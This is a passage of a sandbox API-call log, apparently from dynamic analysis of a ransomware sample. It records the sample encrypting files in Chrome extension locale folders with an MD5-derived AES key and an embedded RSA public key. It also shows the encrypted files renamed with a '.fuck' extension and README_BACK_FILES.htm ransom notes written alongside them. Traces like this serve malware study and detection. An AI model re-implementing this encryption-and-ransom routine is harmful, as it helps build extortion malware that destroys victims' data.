[0250.661] CryptDeriveKey (in: hProv=0x29890d8, Algid=0x6610, hBaseData=0x2985ba0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2985d20) returned 1 [0250.661] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.661] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.661] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2988c10) returned 1 [0250.662] CryptImportPublicKeyInfo (in: hCryptProv=0x2988c10, dwCertEncodingType=0x1, pInfo=0x2933e50*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2933e80*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2933e88*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2985960) returned 1 [0250.662] CryptEncrypt (in: hKey=0x2985960, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.662] CryptEncrypt (in: hKey=0x2985960, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2988e30*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2988e30*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.662] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2988e30*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2988e30*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.663] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xf6, lpOverlapped=0x0) returned 1 [0250.664] CryptEncrypt (in: hKey=0x2985d20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf6, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x100) returned 1 [0250.664] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x100, lpOverlapped=0x0) returned 1 [0250.664] CloseHandle (hObject=0x5d58) returned 1 [0250.664] CloseHandle (hObject=0x5d5c) returned 1 [0250.664] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_br\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_br\\messages.json"), bFailIfExists=0) returned 1 [0250.668] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json", dwFileAttributes=0x0) returned 1 [0250.669] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_br\\messages.json.gsg")) returned 1 [0250.670] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_br\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_br\\messages.json.fuck")) returned 1 [0250.671] CryptDestroyHash (hHash=0x2985ba0) returned 1 [0250.671] CryptDestroyKey (hKey=0x2985d20) returned 1 [0250.671] CryptReleaseContext (hProv=0x29890d8, dwFlags=0x0) returned 1 [0250.671] FindNextFileA (in: hFindFile=0x29859e0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.672] FindClose (in: hFindFile=0x29859e0 | out: hFindFile=0x29859e0) returned 1 [0250.672] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_br\\readme_back_files.htm")) returned 0xffffffff [0250.672] AreFileApisANSI () returned 1 [0250.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e33b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0250.672] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_br\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0250.673] GetFileType (hFile=0x5d54) returned 0x1 [0250.673] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.674] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.674] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985aa0 [0250.675] FindNextFileA (in: hFindFile=0x2985aa0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.675] FindNextFileA (in: hFindFile=0x2985aa0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.675] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.675] GetLastError () returned 0x0 [0250.675] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_pt\\messages.json")) returned 0x20 [0250.675] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json", dwFileAttributes=0x80) returned 1 [0250.676] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.676] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_pt\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0250.678] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.679] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2988c98) returned 1 [0250.681] CryptCreateHash (in: hProv=0x2988c98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.681] lstrlenA (lpString="dKFUHQAZHTBtFXQUaXBopKFNzMlQm") returned 29 [0250.681] CryptHashData (hHash=0x2985ba0, pbData=0x28cb4e0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.681] CryptDeriveKey (in: hProv=0x2988c98, Algid=0x6610, hBaseData=0x2985ba0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2985ea0) returned 1 [0250.682] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.682] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.682] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2988308) returned 1 [0250.684] CryptImportPublicKeyInfo (in: hCryptProv=0x2988308, dwCertEncodingType=0x1, pInfo=0x2933f20*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2933f50*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2933f58*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2985ee0) returned 1 [0250.684] CryptEncrypt (in: hKey=0x2985ee0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.684] CryptEncrypt (in: hKey=0x2985ee0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x29890d8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x29890d8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.684] WriteFile (in: hFile=0x5d58, lpBuffer=0x29890d8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x29890d8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.685] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x108, lpOverlapped=0x0) returned 1 [0250.686] CryptEncrypt (in: hKey=0x2985ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x108, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x110) returned 1 [0250.686] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x110, lpOverlapped=0x0) returned 1 [0250.687] CloseHandle (hObject=0x5d5c) returned 1 [0250.687] CloseHandle (hObject=0x5d58) returned 1 [0250.687] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_pt\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_pt\\messages.json"), bFailIfExists=0) returned 1 [0250.690] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json", dwFileAttributes=0x0) returned 1 [0250.691] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_pt\\messages.json.gsg")) returned 1 [0250.692] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_pt\\messages.json.fuck")) returned 1 [0250.693] CryptDestroyHash (hHash=0x2985ba0) returned 1 [0250.693] CryptDestroyKey (hKey=0x2985ea0) returned 1 [0250.693] CryptReleaseContext (hProv=0x2988c98, dwFlags=0x0) returned 1 [0250.694] FindNextFileA (in: hFindFile=0x2985aa0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.694] FindClose (in: hFindFile=0x2985aa0 | out: hFindFile=0x2985aa0) returned 1 [0250.694] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_pt\\readme_back_files.htm")) returned 0xffffffff [0250.694] AreFileApisANSI () returned 1 [0250.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0250.694] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_pt\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0250.695] GetFileType (hFile=0x5d54) returned 0x1 [0250.695] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.696] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.696] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ea0 [0250.697] FindNextFileA (in: hFindFile=0x2985ea0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.697] FindNextFileA (in: hFindFile=0x2985ea0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.697] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.697] GetLastError () returned 0x0 [0250.697] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json")) returned 0x20 [0250.698] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json", dwFileAttributes=0x80) returned 1 [0250.699] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0250.699] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.700] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.700] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x29887d0) returned 1 [0250.703] CryptCreateHash (in: hProv=0x29887d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.703] lstrlenA (lpString="dKFUHQAZHTBtFXQUaXBopKFNzMlQm") returned 29 [0250.703] CryptHashData (hHash=0x2985a60, pbData=0x28cb3f0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.703] CryptDeriveKey (in: hProv=0x29887d0, Algid=0x6610, hBaseData=0x2985a60, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2985d20) returned 1 [0250.703] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.703] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.703] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x29884a0) returned 1 [0250.703] CryptImportPublicKeyInfo (in: hCryptProv=0x29884a0, dwCertEncodingType=0x1, pInfo=0x2933ff0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2934020*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2934028*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2985d60) returned 1 [0250.703] CryptEncrypt (in: hKey=0x2985d60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.704] CryptEncrypt (in: hKey=0x2985d60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2988b00*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2988b00*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.704] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2988b00*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2988b00*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.705] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x119, lpOverlapped=0x0) returned 1 [0250.706] CryptEncrypt (in: hKey=0x2985d20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x119, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x120) returned 1 [0250.706] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x120, lpOverlapped=0x0) returned 1 [0250.707] CloseHandle (hObject=0x5d58) returned 1 [0250.707] CloseHandle (hObject=0x5d5c) returned 1 [0250.707] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 